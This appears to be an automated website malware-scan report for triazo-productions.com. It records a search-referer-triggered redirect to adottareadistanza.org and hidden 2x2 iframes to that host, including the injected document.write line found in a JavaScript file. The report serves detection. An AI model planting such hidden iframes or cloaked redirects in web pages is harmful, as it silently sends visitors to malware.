Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.triazo-productions.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.triazo-productions.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sun, 21 Sep 2014 19:48:29 GMT Location: http://adottareadistanza.org/chof.html?h=938321 Server: Apache Content-Length: 231 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.triazo-productions.com/ | 200 OK Content-Length: 3603 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://adottareadistanza.org/chof.html?i=938321 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://adottareadistanza.org/chof.html?i=938321> | ||
http://www.triazo-productions.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8193 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://adottareadistanza.org/chof.html?j=938321></iframe>');
var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; case "vspace": case "hspace": case "class": case "title": case "accesskey": case "name": case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://adottareadistanza.org/chof.html?j=938321 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://adottareadistanza.org/chof.html?j=938321> | ||
http://www.triazo-productions.com/test404page.js | 404 Not Found Content-Length: 236 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=triazo-productions.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://triazo-productions.com/
Result: triazo-productions.com is not infected or malware details are not published yet.
Result: triazo-productions.com is not infected or malware details are not published yet.